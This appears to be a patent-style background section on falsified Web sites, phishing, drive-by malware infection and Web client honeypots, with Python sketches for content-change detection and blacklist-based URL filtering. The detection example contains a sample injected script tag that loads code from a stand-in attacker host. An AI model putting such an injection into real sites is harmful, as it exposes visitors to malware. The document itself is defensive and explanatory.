Conventionally, the World Wide Web (hereinafter referred to as the “Web”), a system for easily exchanging text, images, videos, and the like over the Internet, has been the main form of Internet use, and various services, such as e-mail, video viewing, and social networking, are provided on the Web.
However, a general user may be victimized by a malicious Web site providing a malicious service. For example, in phishing, an attacker prepares a false Web site disguised as a genuine one, so that when a general user accesses the false site by mistake, the user enters confidential information, such as credit card information, personal information, or authentication information, without noticing the deception, and the information is leaked to the attacker.
Further, in recent years, the Web has been used as an infection route for malware, that is, malicious software. If a malicious Web site is accessed with a Web browser having a vulnerability, the malicious Web site returns content including malicious code that attacks the Web browser. When the vulnerable Web browser loads the malicious code, control of the browser program is taken over, and the browser is forcibly made to download and install the malware, resulting in malware infection. A genuine site may also be falsified and thereby turned into such a malicious site, or into a site that serves as an entrance to a malicious site.
Falsification of a Web site may result from leakage of the authentication information of the Web site's administrator. If the administrator's host is infected with malware, the malware may transmit the authentication information to an outside attacker, and the leaked information may then be used to falsify the Web site as described above.
To keep damage to general users from misuse of a falsified site to a minimum, the falsified site needs to be found early. To identify whether a site has been falsified, its content is stored in advance, before any falsification, and changes are identified from the difference between the stored content and the current content; falsification can be found when the content has changed in a way that the administrator of the Web site is not aware of. Such changes in the content can be identified by use of a file history management tool (for example, see Non-Patent Literature 1).
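The comparison described above can be illustrated with a short Python sketch. It is a minimal illustration under stated assumptions, not the file history management tool of Non-Patent Literature 1: it assumes page content is available as text and that the administrator registers a SHA-256 digest of every version they intentionally publish, so that any content whose digest is not registered counts as a change the administrator is not aware of. The function names `digest`, `is_unexpected_change`, and `change_report` and the sample pages are hypothetical.

```python
import difflib
import hashlib


def digest(content: str) -> str:
    """SHA-256 digest of page content, used as a compact fingerprint."""
    return hashlib.sha256(content.encode("utf-8")).hexdigest()


def is_unexpected_change(current: str, approved: set[str]) -> bool:
    """True if the current content matches no version the administrator approved.

    Assumption: `approved` holds digests of every intentionally published version.
    """
    return digest(current) not in approved


def change_report(baseline: str, current: str) -> list[str]:
    """Unified-diff lines between the stored baseline and the current content.

    An empty list means the two texts are identical.
    """
    return list(
        difflib.unified_diff(
            baseline.splitlines(),
            current.splitlines(),
            fromfile="baseline",
            tofile="current",
            lineterm="",
        )
    )


# Hypothetical example: the live page has an injected script tag.
stored = "<html>\n<body>Welcome</body>\n</html>"
approved = {digest(stored)}
live = '<html>\n<body>Welcome</body>\n<script src="http://attacker.example/x.js"></script>\n</html>'

if is_unexpected_change(live, approved):
    for line in change_report(stored, live):
        print(line)
```

Storing only digests keeps the routine check cheap, but producing a readable difference still requires a full copy of the baseline content, which is why the sketch keeps both.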
Further, in recent years, there have been cases where a computer terminal or a server (hereinafter, both referred to as a “host” without distinction) becomes infected with malware, resulting in destruction of information inside the host or in the host itself being abused as a stepping stone for new attacks. Malware is also able to leak information in the host to the outside without permission. Since not only personal information but also confidential information of a company, a government, a military organization, or the like may be leaked, information leakage through malware infection has become a problem.
Malware infection through various routes has been confirmed, including, for example: a user clicking on and installing malware disguised as a file attached to an e-mail; malware disguised as general software distributed on a Web site; malware disguised as a file shared over a P2P network; malware being automatically downloaded and installed when a Web site containing attack code is browsed with a vulnerable Web browser; and the like.
In particular, with respect to malware infection via the Web, there have recently been many cases in which a genuine Web site is falsified and becomes an entrance to a malicious site. Since redirection code pointing to the malicious site is inserted into the falsified site, when a general user accesses the falsified site by mistake, the access is automatically redirected to the malicious site, causing malware infection. One cause of such falsification of a general site is that its administrator becomes infected with malware, the administrator's authentication information is leaked, and an attacker then fraudulently intrudes into the site and falsifies its content.
Against malware infection through browsing of Web sites, users can be protected by finding and listing such malicious Web sites in the Web space in advance and filtering user communication based on that list. One method of finding malicious Web sites in the Web space is examination of Web sites using a Web client honeypot.
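List-based filtering of this kind can be sketched as follows. This is an illustrative sketch only, assuming the list holds domain names (a real list might instead hold full URLs or IP addresses) and that a request is blocked when its host or any parent domain of that host is listed. The function `is_blocked` and the `.example` domains are hypothetical.

```python
from urllib.parse import urlsplit


def is_blocked(url: str, blacklist: set[str]) -> bool:
    """Return True if the URL's host, or any parent domain of it, is listed.

    Assumption: `blacklist` contains lowercase domain names such as "malicious.example".
    """
    # urlsplit().hostname is already lowercased; strip a trailing FQDN dot.
    host = (urlsplit(url).hostname or "").rstrip(".")
    if not host:
        return False
    labels = host.split(".")
    # Check "a.b.c", then "b.c", then "c" so that subdomains of a listed domain match.
    for i in range(len(labels)):
        if ".".join(labels[i:]) in blacklist:
            return True
    return False


# Hypothetical list of malicious domains found in advance.
blacklist = {"malicious.example"}

for url in (
    "http://malicious.example/exploit.html",
    "https://cdn.malicious.example/a.js",
    "https://benign.example/",
):
    print(url, "BLOCK" if is_blocked(url, blacklist) else "ALLOW")
```

Matching parent domains catches subdomains of a listed site, but it also means that listing a very broad entry would block everything beneath it, so list entries need to be chosen with care.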
A Web client honeypot is a decoy system that accesses Web sites using a vulnerable Web browser and detects attacks that cause malware infection. By patrolling the Web space with such a Web client honeypot, malicious sites can be found (for example, see Non-Patent Literatures 2 and 3). Since a vast number of Web sites and URLs exist in the Web space, efficient patrolling methods for this examination have been proposed (for example, see Non-Patent Literatures 4 and 5).